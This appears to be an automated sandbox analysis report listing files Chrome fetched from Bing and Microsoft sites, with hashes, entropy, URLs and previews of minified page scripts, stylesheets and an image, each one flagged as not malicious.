                                                                            Preview:/*!DisableJavascriptProfiler*/.var BM=BM||{};BM.config={B:{timeout:250,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:7e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:50},BD:{basic:1}},function(n){function vt(){if(!document.querySelector||!document.querySelectorAll){k({FN:"init",S:"QuerySelector"});return}w={};e=[];ft=1;ut=0;rt=0;o=[];s=0;h=!1;var n=Math.floor(Math.random()*1e4).toString(36);t={P:{C:0,N:0,I:n,S:ei,M:r,T:0,K:r,F:0}};pi()}function oi(n,t){var r={};for(var i in n)i.indexOf("_")!==0&&(i in t&&(n[i]!==t[i]||i==="i")?(r[i]=t[i],n[i]=t[i]):r[i]=null);return r}function si(n){var i={};for(var t in n)n.hasOwnProperty(t)&&(i[t]=n[t]);return i}function b(n,t,r,u){if(!h){k({FN:"snapshot",S:n});return}r=r||ni;t=t||!1;var f=g()+r;ot(o,n)===-1&&o.push(n);t?(yt(),pt(t,u)):f>s&&(yt(),rt=sb_st(pt,r),s=f)}function k(n){var u={T:"CI.BoxModelError",FID:"CI",Name:ht,SV:ct,P:t&&"P"in t?d(t.P):r,TS:f(),ST:v},i,e;for(i in n)u[i]=n[i];e=d(u
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (667), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):667
                                                                            Entropy (8bit):5.251512275863699
                                                                            Encrypted:false
                                                                            SSDEEP:12:fr5esz7hNGwXI2QA3QglxfLQOtKfWM1kI2JGC+t5821xw9i/UJpN0I:fr5NhNGOgAggDDQOtjMbhH582Ugk0I
                                                                            MD5:2AB12BF4A9E00A1F96849EBB31E03D48
                                                                            SHA1:7214619173C4EC069BE1FF00DD61092FD2981AF0
                                                                            SHA-256:F8B5ACF4DA28E0617F1C81093192D044BD5A6CC2A2E0C77677F859ADCF3430AC
                                                                            SHA-512:7D5AAE775BE1E482EADA1F453BEA2C52A62C552FA94949E6A6081F322E679E916B1276BB59FF28CF7C86D21727BCC329ECB03E5D77CA93204E0CD2694FAA72BD
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/chRhkXPE7Aab4f8A3WEJL9KYGvA.js
                                                                            Preview:sb_ie&&function(){function h(){if(t){var u=n.replace(/www\./i,"");return f&&i(t,r,n+"?PC="+f)||i(t,r,n)||i(t,r,u)||i(t,r,n+"?Form=HPPDH1")||i(t,r,n+"?PC=BNHP")||i(t,r,n+"?PC=BNSR")}return 0}function c(){return i(_w.external,s,n)!=0}function l(){if(u){var n=2*e+o;if(u==n)return!0}return!1}function a(){var n=_ge("hps");return n||(n=sj_ce("span","hps"),n.style.behavior="url(#default#homepage)",sj_b.appendChild(n)),n}function i(n,t,i){try{return n[t](i)}catch(r){return 0}}var s="IsSearchProviderInstalled",r="isHomepage",n="http://"+_d.domain+"/",u=sj_cook.get("_UR","D"),f=sj_cook.get("SRCHS","PC"),t=a(),e=h(),o=c();l()||(u=2*e+o,sj_cook.set("_UR","D",u,1,"/"))}()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (63879)
                                                                            Category:downloaded
                                                                            Size (bytes):908520
                                                                            Entropy (8bit):5.118109706157387
                                                                            Encrypted:false
                                                                            SSDEEP:6144:ZDZAOPZ9dyG1lBNZF6Z95+KpZ93+KmzvpRdU6mM+SMGquOa2+KT3zt/zXtRNtRQf:ZDZR1OyQcmTe3T
                                                                            MD5:9F6961C4FD680EDDD62937274871DD33
                                                                            SHA1:F0C070BFB36912F27CAC1852C819099EBD4AA83B
                                                                            SHA-256:1BEB4AC64CBE99A338488F948A3EEA605303B9D3B67E529DF4C96AA5CB37F469
                                                                            SHA-512:E3B27DC4DF5449F1704EE8F732314BD3E8E87BE3485DECF68CA7E2D51A2728E9F8AD74698EF7C43FE5DCF999A93D49D10A5A9EF1CFE04862484A5B5904035D5A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://answers-afd.microsoft.com/static/css/mwf/bundle/bundle.thread-view-mwfv3.1.0.4.354.min.css
                                                                            Preview:/*! Error: src/components/breadcrumb/styles/_breadcrumb.scss(24,12): run-time error CSS1036: Expected expression, found '/' */./*! ==========================File Included===================================== */./*! bundles\mwf-main */./*! components\glyph */./*! components\spacers */./*! OriginalFile: mwf-main, Relative Path: bundles\mwf-main */.@charset "UTF-8";./*! 1.53.1 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (706), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):706
                                                                            Entropy (8bit):5.324617338841009
                                                                            Encrypted:false
                                                                            SSDEEP:12:2QoJbj1Lrh7/za24qLB522SdEDmNiuNSu/x/1E1JU++1QFeR+lLMG1fQAAQE6HT:2Qylrh7/W2405SAHuz9E1JUf1QERfG1h
                                                                            MD5:72151CA48B5E0F8DA1607048790D1C72
                                                                            SHA1:DF22E98ABAFABC053247C6DE86DDF2B9FBC1E4A9
                                                                            SHA-256:1062558E64DB772353A851A2C566AA1E8C41C001A5C828336B502568E2F46C04
                                                                            SHA-512:0BA742C7AD0240ACEC13BC9EF4257F81D9FF3BB8E894A60ED01C00C9E0722FF8A2EF3C35025F314AF8E370519B5A27FE04CF039727D2D5E26ADCDE941E2734CB
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/3yLpirr6vAUyR8beht3yufvB5Kk.js
                                                                            Preview:(function(){function e(n,t,i){typeof Log!="undefined"&&Log.Log&&Log.Log(n,t,i,!0)}function t(t,h){var l;t!=h&&(_w.DMMode=h);l=r(n,u);l!=h&&i(n,u,h,!0,"/",null);e("Info",o,h);var c=new URLSearchParams(_w.location.search),y=c&&c.get("features")&&c.get("features").split(",").indexOf("webthemedark")!==-1,a=c.get("webthemedark")==="1"||y;a&&i(n,f,"1",!0,"/",null);var v=r(n,f),p=h=="1"&&v=="2",w=v=="1",b=a||p||w?"1":"0";e("Info",s,b)}function h(n,i,r){var u="(prefers-color-scheme:"+n+")";return _w.matchMedia(u).matches?(t(i,r),!0):!1}function c(){var n=_w.DMMode;_w.matchMedia?h("dark",n,"1")||t(n,"0"):t(n,"0")}var i=sj_cook.set,r=sj_cook.get,n="SRCHHPGUSR",u="DM",f="WEBTHEME",o="DM",s="DARKMODE";c()})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1180), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1180
                                                                            Entropy (8bit):4.988141433361417
                                                                            Encrypted:false
                                                                            SSDEEP:24:fDQkmXs9uV6Ts4uVX3vXsKQuVX+qasFuVfCEsKMCEafduycsgoRs7:sk46iPNzuHDfcyA
                                                                            MD5:7E9449EC41F1879933363736121B8C0D
                                                                            SHA1:33DB975E5DAA274764904D8D3558C5008A746C28
                                                                            SHA-256:77C593F3EA8A5FCA8E1ADAC9EDA2B74C634DAFB3149B4D719CA73673C5B0908E
                                                                            SHA-512:3C34C7AC61CF053D60159E1A68387C5E4EC0AE141A5C18C28029F71093EE138C3B4AF039C6753D4C5993E1E30C88FFB3A6A832CFD30ECF595CE8CF1FD6E8DC74
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/M9uXXl2qJ0dkkE2NNVjFAIp0bCg.css
                                                                            Preview:#b_results>.b_ans:not(.b_top):nth-child(n+5) .rqnaContainerwithfeedback #df_listaa{content-visibility:auto;contain-intrinsic-size:648px 205px}#b_results>.b_algo:not(.b_algoBorder):nth-child(n+5)>h2{content-visibility:auto;contain-intrinsic-size:608px 24px}#b_results>.b_algo:not(.b_algoBorder):nth-child(n+5) .b_caption:not(.b_rich):not(.b_capmedia):not(.b_snippetgobig):not(.rebateContent){content-visibility:auto;contain-intrinsic-size:608px 65px;padding-right:16px;margin-right:-16px;margin-left:-16px;padding-left:16px}#b_results>.b_algo:not(.b_algoBorder):nth-child(n+5) .b_caption.b_rich .captionMediaCard .wide_wideAlgo{content-visibility:auto;contain-intrinsic-size:370px 120px}#b_results>.b_algo:not(.b_algoBorder):nth-child(n+5) .scs_icn{content-visibility:auto}#b_results>.b_ans:nth-child(n+7) .b_rs:not(.pageRecoContainer){content-visibility:auto;contain-intrinsic-size:608px 296px}#b_results>.b_ans:nth-child(n+7) .b_rs:not(.pageRecoContainer) .b_rsv3{padding-bottom:1px}#b_results>.b_pa
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (824), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):824
                                                                            Entropy (8bit):5.3314854117420465
                                                                            Encrypted:false
                                                                            SSDEEP:24:2QQ3xVJjKVJ5o7VEioPVKofuVJ0PoRGP2QbAX53CO2Wd6o0YmmBM:AjWUJEhNZsvc8XgO2Wdh0Jm6
                                                                            MD5:3FF8EECB7A6996C1056BBE9D4DDE50B4
                                                                            SHA1:FDC4D52301D187042D0A2F136CEEF2C005DCBB8B
                                                                            SHA-256:01B479F35B53D8078BACA650BDD8B926638D8DAAA6EB4A9059E232DBD984F163
                                                                            SHA-512:49E68AA570729CC96ED0FD2F5F406D84869772DF67958272625CBA9D521CA508955567E12573D7C73D7E7727260D746B535C2CE6A3ACE4952EDF8FD85F3DB0DD
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/_cTVIwHRhwQtCi8TbO7ywAXcu4s.js
                                                                            Preview:(function(){function i(){var f="data-load",u,i;if(n&&!n.hasAttribute(f))try{if(_d.body.appendChild(n),typeof sj_gx=="function"){if(u=r.replace("%IG%",_G.IG).replace("%IID%",n.getAttribute("data-iid")).replace("%PARTNER%",n.getAttribute("data-ptn")).replace("%ENABLEP%",n.getAttribute("data-ep")).replace("%ICONPRELOADED%",n.getAttribute("data-iconpl")),n.setAttribute(f,"1"),i=sj_gx(),!i)return null;i.onreadystatechange=function(){typeof sj_appHTML=="function"&&4==i.readyState&&200==i.status&&sj_appHTML(n,i.responseText)};i.open("GET",t?SbiTst.at(u):u,!0);i.send(null)}}catch(e){}}function u(){if(n){var r=n.getAttribute("data-evt");r&&!t?sj_evt.bind(r,i,!0):i()}}var r="/images/sbi?mmasync=1&ig=%IG%&iid=%IID%&ptn=%PARTNER%&ep=%ENABLEP%&iconpl=%ICONPRELOADED%",n=_ge("sbicom_loader"),t=typeof SbiTst!="undefined";u()})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (838), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):838
                                                                            Entropy (8bit):5.10179630103155
                                                                            Encrypted:false
                                                                            SSDEEP:24:01rReu5mXKBj/BsKkRW5LuRWCfRM7ssdvcR:09wwDEw56w2+s6cR
                                                                            MD5:8C8B189422C448709EA6BD43EE898AFB
                                                                            SHA1:A4D6A99231D951F37D951BD8356D9D17664BF447
                                                                            SHA-256:567506D6F20F55859E137FCBD98F9E1A678C0D51192FF186E16FD99D6D301CFF
                                                                            SHA-512:6FAA73D59082065426769A27081CBEDCD22146EF948AFDD9A86801F205B2DDDC63E03AC5D555EF0AF23EF05901EBFFE7E8AADD82260EF505CB89D99E572FDF4A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var CursorProgress;(function(n){function f(n){while(n&&n.nodeName!=="A")n=n.parentElement;return n}function e(n){var u,e,o,s;n.button!==0||n.ctrlKey||n.shiftKey||(u=f(sj_et(n)),u!=null)&&u.getAttribute("role")!=="button"&&(r(),e=(u.getAttribute("href")||"").trim().toLowerCase(),e!==""&&e.indexOf("javascript:")!==0&&e.indexOf("#")!==0)&&(o=u.getAttribute("target"),o===null||o.trim()==="")&&(Lib.CssClass.add(u,t),s=_ge("b_content"),s!==null&&Lib.CssClass.add(s,t),i!==null&&(sb_ct(i),i=null),i=sb_st(r,5e3))}function r(){for(var i=_d.getElementsByClassName(t),n=i.length-1;n>=0;n--)Lib.CssClass.remove(i[n],t)}function u(){var r=_ge("b_content"),n,t,i;if(r!==null&&(n=r.getElementsByTagName("A"),n))for(t=0;t<n.length;t++)(i=n[t],i)&&sj_be(i,"click",e)}var t="b_CursorProgress",i=null;n.bind=u;u()})(CursorProgress||(CursorProgress={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):194
                                                                            Entropy (8bit):4.801766066348914
                                                                            Encrypted:false
                                                                            SSDEEP:3:5AnHDdEZmJMKsc3py/R3fR8AnHDufS4ELAnHDykBrfa6CjUAnHDfJPLhRpEa:enj+mWmivRRnjuqwnjyILaNZnjfJLj
                                                                            MD5:B6CA0AD63345090A25D0CB175ECD2ABF
                                                                            SHA1:7D91635F005E98F53215B82E18FB686113953CCB
                                                                            SHA-256:A7039377C86801D6ED892153A4FBCF5DBE55A21468DECBE4F82C0E8223BE5F45
                                                                            SHA-512:1ACC1E243EE4DEE82F13AE4E2F34990A712B6960CAF5021F06DEC353A954219FFA3557A4FD3553D33A07ABA1E5E4ECB385EA37354CD4CE6AA2B2870A3C085E47
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/fZFjXwBemPUyFbguGPtoYROVPMs.css
                                                                            Preview:#ntf_newtabfil{display:inline-block;padding-right:40px;font-size:14px}#ntf_newtabfil:hover{color:#111}#ntf_newtabfil .nt_tit{width:auto;margin-right:8px}#ntf_newtabfil .nt_val{margin-bottom:1px}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (511), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):511
                                                                            Entropy (8bit):4.980041296618112
                                                                            Encrypted:false
                                                                            SSDEEP:12:yWF4eguIWKvU9bEMsR5OErixCvJO1Vi5rgsM:LF4mKctEMYOK4CvJUVYM
                                                                            MD5:D6741608BA48E400A406ACA7F3464765
                                                                            SHA1:8961CA85AD82BB701436FFC64642833CFBAFF303
                                                                            SHA-256:B1DB1D8C0E5316D2C8A14E778B7220AC75ADAE5333A6D58BA7FD07F4E6EAA83C
                                                                            SHA-512:E85360DBBB0881792B86DCAF56789434152ED69E00A99202B880F19D551B8C78EEFF38A5836024F5D61DBC36818A39A921957F13FBF592BAAFD06ACB1AED244B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var BingAtWork;(function(n){var t;(function(n){function t(t,i){var u,r;t.isAuthenticated&&(n.raiseAuthEventAndLog(t),u=_ge("sb_form_q"),u&&(r=u.getAttribute("value"),r&&(n.fetchLowerHeader(r),n.fetchScopeBar(r),i.notifEnabled&&i.notifFetchAsync&&n.fetchNotificationConditional())))}function i(n,i){n&&n.length==2&&t(n[1],i)}n.bindToConditionalSignIn=function(n){sj_evt.bind("ssofirstquery",function(t){return i(t,n)},!0,null,!1)}})(t=n.ConditionalSignIn||(n.ConditionalSignIn={}))})(BingAtWork||(BingAtWork={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):264
                                                                            Entropy (8bit):4.87886055024063
                                                                            Encrypted:false
                                                                            SSDEEP:6:Hav3xPPAIR2KlPMdsy3B57sMxPPqw+qjUxPOyl0z+APTGAS:HQ3OicdTRiqYYyjyGP
                                                                            MD5:D13E2820E85393293120A8AB4ABD085B
                                                                            SHA1:BF37B778EF0ED421585BA11F064DCC7205DC849E
                                                                            SHA-256:9155B4F58D4B039231647D1FC28DD935F45E4E4861ECADBE4F88A8003152BB12
                                                                            SHA-512:7A576E46D606FED9424EDD02CD196FC10D4786CB86404A2BEAFA8B6E276139C1608B0F3C761BCA2E3C407B9369D6D4B51DB1D9785DF6D257BF82E0A3433B5E52
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/vze3eO8O1CFYW6EfBk3McgXchJ4.css
                                                                            Preview:#b_content #b_results .b_tpcn .tpic .wr_fav{background-color:#f1f3f4;border:1px solid #ddd;overflow:hidden}#b_results .b_tpcn .tpic .wr_fav .siteicon img{border-radius:4px}#b_results .b_tpcn .b_lario .tpic .wr_fav .siteicon img{width:26px;height:26px;left:0;top:0}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (739), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):739
                                                                            Entropy (8bit):5.152908569852501
                                                                            Encrypted:false
                                                                            SSDEEP:12:2Q83RWcRSWm/LwZZ06ruc/Jj6rP4W/pDm9Nn/pDtO7gjl0OuMtokw1fRGy8XHnu:2QQRWOSWm/IF67r4uYD/jO7a2e+kw1ff
                                                                            MD5:D63DC48463B90F3B30A5CAC5A4AABDE4
                                                                            SHA1:86C70A354A2BD42493BA78F88760CCEF1100C203
                                                                            SHA-256:47D20F8C99C06028167C9B2578691263F0EEA547F5741508838EB937E4878C54
                                                                            SHA-512:10425331F9BF32F3F4620A527AC0B43C697921F5F2940562FD4DACAF2F881AE4D8A7BFA85E284ED1DB183AEC2EEE46B3616F69C8BC1293102A70C97B51B999C2
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){function t(){for(var t,u,r=_d.getElementsByTagName("A"),i=0;i<r.length;i++)if(t=r[i].getAttribute("href"),r[i].getAttribute("target")!="_blank")if(t&&(t.startsWith("/")||t.indexOf(".bing.com")>=0)){for(u=0;u<n.length;u++)if(t.startsWith(n[u])||t.indexOf(".bing.com"+n[u])>=0){r[i].setAttribute("target","_blank");break}}else t&&t.startsWith("http")&&r[i].setAttribute("target","_blank");Log&&sj_cook&&Log.Log("NewTab","Client",sj_cook.get("SRCHHPGUSR","EXLKNT"),!1)}var n=["/ac","/clk","/ck","/rebates","/images","/shop","/news","/videos","/alink/link","/spotlight","/dict","/academic","/travel","/jobs","/translator","/product","/cricketdetails","/local","/school","/new","/map","/work","/homes"];t();sj_evt.bind("onP1",t)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (438), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):438
                                                                            Entropy (8bit):4.979298238695662
                                                                            Encrypted:false
                                                                            SSDEEP:6:GYDBu9nR/ROYolkb6LVkBcoY31QCvJ0D1pvQTb/ZgLvxB8fCvJ0DARJ5gn:GYMAYgWCIcFlQaJ0/ceL5BEaJ0QTgn
                                                                            MD5:AF1E56249DB33E95D4F82B62FBAC4E64
                                                                            SHA1:BC91BA42447DBF2526334E64B037D3B657646C92
                                                                            SHA-256:B7BEFB4F876530CB3D04230756AA17AB4A1569012038999BBD5416C94E6CB8A2
                                                                            SHA-512:86F1E710D5749DE8DAC67E0836922C677CE663B4609330702B8C7D532E275668A4EB6BD68F7DC5BA13BC05AFB6FC63BEBF3EC49EBB61CF8BEAFC50403F28ECE4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/vJG6QkR9vyUmM05ksDfTtldkbJI.css
                                                                            Preview:.b_caption.b_snippetgobig p{font-size:18px;line-height:24px !important;color:#111}.b_algo.b_algoBorder{box-shadow:0 0 0 1px rgba(0,0,0,.05);border-radius:6px}#b_results>li.b_algoBorder{margin-top:8px;padding-top:15px}#b_results>li.b_algoBorder.b_algo_feedback{margin-bottom:19px;position:relative}.b_gobig_feedback{position:absolute;right:19px;bottom:-21px}#b_results>li.b_algoBorder.b_algo_feedback+li.b_ans.b_mop.b_mopb{margin-top:28px}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (5541), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):5541
                                                                            Entropy (8bit):5.284077415912716
                                                                            Encrypted:false
                                                                            SSDEEP:96:kiJhScXzjAPVNl6cvPOZWNjJnTddDxxtg2EIECSOsDquOj:kiZEjXOZWb/Dxs2EIEzOsDquOj
                                                                            MD5:B74C06F7269A859029BC7283F86CFEA9
                                                                            SHA1:67674018AC28BA87298B13820CE30236632E2006
                                                                            SHA-256:C97F4ED023D7D8CDAD62F30C2FDB43FA7343ECA62EA0C0BFC90B378DED60DBDA
                                                                            SHA-512:99307CBFDE03CD99643DBE6E744ED10BA89E5E19F5F8E51BE847CEF8735284B170399580A7A851DC71720791098714454C0E05051F7B0EC42AB84A0D98AF94A6
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var Feedback;(function(n){var t;(function(t){function u(t,r,u,f,e,o){t=typeof t===i?!1:t;t&&scrollTo(0,0);u=typeof u===i?!0:u;n.PackageLoad.Load(r,u,f,e,o)}function o(n,t){for(var r=0,i=null;n&&n.getAttribute&&(!(t>=1)||r<t);){if(i=n.getAttribute("data-fbhlsel"),i!=null)break;r++;n=n.parentNode}return i}function l(t,l,a,v,y,p,w,b,k){function tt(t){var r=null,i;return t&&(i=new h,n.fel("ajax.feedback.collectsettings","gsf",i),r=i.findSettings(t)),r}var d,g,nt;(typeof sj_log!="undefined"&&sj_log("CI.FeedbackInit","Feedback",!l||l.length===0?"invalid":l),d=_ge(l),d&&d.classList&&d.classList.contains(s))||(g=o(d,3),e!=="sb_feedback"&&(e=l,typeof sj_evt!==i&&(r&&sj_evt.unbind(f,r),r=function(n){var f=null,i=null,e=null,s,r,h;n&&n.length>1&&(r=n[1],r.tagName!==undefined&&r.nodeType!==undefined?(f=r,i=tt(f)):i=r,s=i&&i.elementToHighlight||f,e=o(s));h=i&&i.linkId||l;u(v,t,a,h,e,i)},sj_evt.bind(f,r,1)),typeof SearchAppWrapper!==i&&SearchAppWrapper.CortanaApp&&SearchAppWrapper.CortanaApp.addEven
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):4565
                                                                            Entropy (8bit):7.879534543139402
                                                                            Encrypted:false
                                                                            SSDEEP:96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
                                                                            MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                            SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                            SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                            SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/UHFbanner-MSlogo?fmt=png-alpha&bfc=off&qlt=100,1"
                                                                            Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (706), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):706
                                                                            Entropy (8bit):5.324617338841009
                                                                            Encrypted:false
                                                                            SSDEEP:12:2QoJbj1Lrh7/za24qLB522SdEDmNiuNSu/x/1E1JU++1QFeR+lLMG1fQAAQE6HT:2Qylrh7/W2405SAHuz9E1JUf1QERfG1h
                                                                            MD5:72151CA48B5E0F8DA1607048790D1C72
                                                                            SHA1:DF22E98ABAFABC053247C6DE86DDF2B9FBC1E4A9
                                                                            SHA-256:1062558E64DB772353A851A2C566AA1E8C41C001A5C828336B502568E2F46C04
                                                                            SHA-512:0BA742C7AD0240ACEC13BC9EF4257F81D9FF3BB8E894A60ED01C00C9E0722FF8A2EF3C35025F314AF8E370519B5A27FE04CF039727D2D5E26ADCDE941E2734CB
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){function e(n,t,i){typeof Log!="undefined"&&Log.Log&&Log.Log(n,t,i,!0)}function t(t,h){var l;t!=h&&(_w.DMMode=h);l=r(n,u);l!=h&&i(n,u,h,!0,"/",null);e("Info",o,h);var c=new URLSearchParams(_w.location.search),y=c&&c.get("features")&&c.get("features").split(",").indexOf("webthemedark")!==-1,a=c.get("webthemedark")==="1"||y;a&&i(n,f,"1",!0,"/",null);var v=r(n,f),p=h=="1"&&v=="2",w=v=="1",b=a||p||w?"1":"0";e("Info",s,b)}function h(n,i,r){var u="(prefers-color-scheme:"+n+")";return _w.matchMedia(u).matches?(t(i,r),!0):!1}function c(){var n=_w.DMMode;_w.matchMedia?h("dark",n,"1")||t(n,"0"):t(n,"0")}var i=sj_cook.set,r=sj_cook.get,n="SRCHHPGUSR",u="DM",f="WEBTHEME",o="DM",s="DARKMODE";c()})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (3500), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):3500
                                                                            Entropy (8bit):5.269539776678984
                                                                            Encrypted:false
                                                                            SSDEEP:96:xnUoj12UnBIat6A08aqIcAco+F7mT3p8j+3erfd12AHFyN:BFIc6LfeAco+OqKwFO
                                                                            MD5:7572F94125C2E7621CD216FC13F29095
                                                                            SHA1:23565B05764C248C77BB82C2B837B49C2D6ACD95
                                                                            SHA-256:B52987B0846D6F1D14BB90DA2C7F45ACF76150E905E3DC8706C96F02D79AA12B
                                                                            SHA-512:9232167870195E4132A52D094B11A5C63D3E296147271F6025FF6F1564DCC46F74F3D0F8AD5809C064130E85697BAE81019D706C8E5DF5A95874B87E229D52E7
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/I1ZbBXZMJIx3u4LCuDe0nC1qzZU.js
                                                                            Preview:var SHgetlochelper;(function(n){function r(r,u,f,e,o,s,h){var c,l;if(navigator&&typeof navigator.geolocation!="undefined"&&typeof navigator.geolocation.getCurrentPosition=="function")if(c=void 0,c=navigator,typeof c.permissions!="undefined"&&typeof c.permissions.query=="function"){l=!1;SHwlochelper.log(t,e,"Perm_Available");try{c.permissions.query({name:"geolocation"}).then(function(c){if(c&&typeof c.state!="undefined"){if(c.state==="denied"){SHwlochelper.log(t,e,"Perm_Denied");SHlochelper.sEM(u,!0);i(e,h,u,f);return}c.state==="prompt"?SHwlochelper.log(t,e,"Perm_Prompt"):c.state==="granted"&&(l=!0,SHwlochelper.log(t,e,"Perm_Granted"))}if(o&&!l)return SHwlochelper.log(t,e,"Perm_NotGranted_NoTryGet"),!1;n.gL(r,u,f,e,s,h)})}catch(a){SHwlochelper.log(t,e,"Error2","Error",a)}}else{if(SHwlochelper.log(t,e,"Perm_Unavailable"),o)return SHwlochelper.log(t,e,"Perm_Unavailable_NoTryGet"),!1;n.gL(r,u,f,e,s,h)}else SHwlochelper.log(t,e,"getCurrentPosition_5");return!1}function i(n,i,r,u){function e
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1938), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1938
                                                                            Entropy (8bit):4.845574242861662
                                                                            Encrypted:false
                                                                            SSDEEP:24:MC9KiSlTW7LIHYd/fqlPN4qH84i147m/OHGcTjKM8V:lKSssqlP1e
                                                                            MD5:08C058B6F3F49157780C93FD5489C84A
                                                                            SHA1:E68BF37AAEB1E7B3D4CAF5F2DF0DE9C705799955
                                                                            SHA-256:19ABD50F8367D2152B519074BB2E8A56428149B9DCE2194922A2ACFC0D691615
                                                                            SHA-512:B6BED2DDE89A71E4DCF1FB48D49D724178AB896A7AF4D5AC7DD59C3A87084510E174AE9ADD2EC6765EC4740C5651CC5C34AD3730AB96CC7FE580C4F1E25F0ED1
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/5ovzeq6x57PUyvXy3w3pxwV5mVU.css
